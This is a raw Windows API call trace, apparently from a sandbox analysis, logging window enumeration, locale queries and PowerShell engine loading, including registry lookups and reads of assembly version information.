	[0941.156] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x10fc
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe34
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xea4
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x514
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe48
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xbc8
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xdf8
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x318
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xcac
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x8bc
	[0941.156] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xf9c
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xf48
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe40
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xecc
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xeb8
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe80
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe98
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe60
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xee4
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xf00
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xdf0
	[0941.157] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xe1c
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xdd0
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xd94
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xd74
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xd00
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xcd8
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc84
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xca4
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc64
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xc24
	[0941.158] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xb84
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xbac
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x384
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xab8
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x33c
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa44
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa64
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x8a8
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xaf0
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x88c
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xb04
	[0941.159] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x910
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x230
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xac0
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xab4
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xaac
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x3d0
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x978
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa7c
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x59c
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa88
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa6c
	[0941.160] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa68
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x9f8
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xa04
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x924
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x8dc
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x7dc
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x768
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x764
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x820
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x810
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x794
	[0941.161] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x83c
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x7ac
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xb44
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x6bc
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0xb5c
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x838
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.162] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x4d0
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x818
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x5b8
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x494
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x1ec
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x440
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x7e8
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x730
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x2c8
	[0941.163] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ad900 | out: lpdwProcessId=0x1ad900) returned 0x31c
	[0941.354] WerSetFlags () returned 0x0
	[0941.360] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0941.361] CoTaskMemFree (pv=0x0) 
	[0941.361] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adc68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adc60 | out: pulNumLanguages=0x1adc68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adc60) returned 1
	[0941.361] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adc68, pwszLanguagesBuffer=0x2c8f2c8, pcchLanguagesBuffer=0x1adc60 | out: pulNumLanguages=0x1adc68, pwszLanguagesBuffer=0x2c8f2c8, pcchLanguagesBuffer=0x1adc60) returned 1
	[0941.366] CoTaskMemAlloc (cb=0x24) returned 0x4131d0
	[0941.366] GetUserDefaultLocaleName (in: lpLocaleName=0x4131d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0941.366] CoTaskMemFree (pv=0x4131d0) 
	[0941.612] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.612] CoTaskMemFree (pv=0x413990) 
	[0941.613] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.614] CoTaskMemFree (pv=0x413990) 
	[0941.615] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.615] CoTaskMemFree (pv=0x413990) 
	[0941.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.625] SetErrorMode (uMode=0x1) returned 0x1
	[0941.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad8e0 | out: lpFileInformation=0x1ad8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.625] SetErrorMode (uMode=0x1) returned 0x1
	[0941.625] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adb50 | out: lpdwHandle=0x1adb50) returned 0x94c
	[0941.626] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c92b58 | out: lpData=0x2c92b58) returned 1
	[0941.627] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adac8, puLen=0x1adac0 | out: lplpBuffer=0x1adac8*=0x2c92bf4, puLen=0x1adac0) returned 1
	[0941.627] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92cd0, puLen=0x1ada30) returned 1
	[0941.627] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.627] CoTaskMemAlloc (cb=0x2e) returned 0x41bf50
	[0941.627] lstrcpyW (in: lpString1=0x41bf50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.627] CoTaskMemFree (pv=0x41bf50) 
	[0941.627] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92d24, puLen=0x1ada30) returned 1
	[0941.627] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.627] CoTaskMemAlloc (cb=0x3c) returned 0x394c60
	[0941.627] lstrcpyW (in: lpString1=0x394c60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.627] CoTaskMemFree (pv=0x394c60) 
	[0941.627] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92d80, puLen=0x1ada30) returned 1
	[0941.627] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.627] CoTaskMemAlloc (cb=0x20) returned 0x41b060
	[0941.627] lstrcpyW (in: lpString1=0x41b060, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.627] CoTaskMemFree (pv=0x41b060) 
	[0941.627] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92dc0, puLen=0x1ada30) returned 1
	[0941.627] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.627] CoTaskMemAlloc (cb=0x44) returned 0x394c60
	[0941.627] lstrcpyW (in: lpString1=0x394c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.628] CoTaskMemFree (pv=0x394c60) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92e28, puLen=0x1ada30) returned 1
	[0941.628] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.628] CoTaskMemAlloc (cb=0x76) returned 0x3c1400
	[0941.628] lstrcpyW (in: lpString1=0x3c1400, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.628] CoTaskMemFree (pv=0x3c1400) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92ec4, puLen=0x1ada30) returned 1
	[0941.628] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.628] CoTaskMemAlloc (cb=0x44) returned 0x394c60
	[0941.628] lstrcpyW (in: lpString1=0x394c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.628] CoTaskMemFree (pv=0x394c60) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92f28, puLen=0x1ada30) returned 1
	[0941.628] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.628] CoTaskMemAlloc (cb=0x58) returned 0x37b0d0
	[0941.628] lstrcpyW (in: lpString1=0x37b0d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.628] CoTaskMemFree (pv=0x37b0d0) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92fa4, puLen=0x1ada30) returned 1
	[0941.628] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.628] CoTaskMemAlloc (cb=0x20) returned 0x41b060
	[0941.628] lstrcpyW (in: lpString1=0x41b060, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.628] CoTaskMemFree (pv=0x41b060) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x2c92c4c, puLen=0x1ada30) returned 1
	[0941.628] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.628] CoTaskMemAlloc (cb=0x66) returned 0x41a200
	[0941.628] lstrcpyW (in: lpString1=0x41a200, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.628] CoTaskMemFree (pv=0x41a200) 
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x0, puLen=0x1ada30) returned 0
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x0, puLen=0x1ada30) returned 0
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ada38, puLen=0x1ada30 | out: lplpBuffer=0x1ada38*=0x0, puLen=0x1ada30) returned 0
	[0941.628] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ada08, puLen=0x1ada00 | out: lplpBuffer=0x1ada08*=0x2c92bf4, puLen=0x1ada00) returned 1
	[0941.628] CoTaskMemAlloc (cb=0x204) returned 0x3c3f00
	[0941.628] VerLanguageNameW (in: wLang=0x0, szLang=0x3c3f00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.629] CoTaskMemFree (pv=0x3c3f00) 
	[0941.629] VerQueryValueW (in: pBlock=0x2c92b58, lpSubBlock="\\", lplpBuffer=0x1ada58, puLen=0x1ada50 | out: lplpBuffer=0x1ada58*=0x2c92b80, puLen=0x1ada50) returned 1
	[0941.635] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.635] CoTaskMemFree (pv=0x413990) 
	[0941.636] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.636] CoTaskMemFree (pv=0x413990) 
	[0941.640] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad928 | out: phkResult=0x1ad928*=0x2e8) returned 0x0
	[0941.641] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad918 | out: phkResult=0x1ad918*=0x2ec) returned 0x0
	[0941.641] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad9a8 | out: phkResult=0x1ad9a8*=0x2f0) returned 0x0
	[0941.643] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8ec, lpData=0x0, lpcbData=0x1ad8e8*=0x0 | out: lpType=0x1ad8ec*=0x1, lpData=0x0, lpcbData=0x1ad8e8*=0x56) returned 0x0
	[0941.643] CoTaskMemAlloc (cb=0x5a) returned 0x41a190
	[0941.643] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad8bc, lpData=0x41a190, lpcbData=0x1ad8b8*=0x56 | out: lpType=0x1ad8bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad8b8*=0x56) returned 0x0
	[0941.644] CoTaskMemFree (pv=0x41a190) 
	[0941.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.972] CoTaskMemAlloc (cb=0x104) returned 0x413990
	[0941.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x413990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.972] CoTaskMemFree (pv=0x413990) 
	[0943.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0943.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
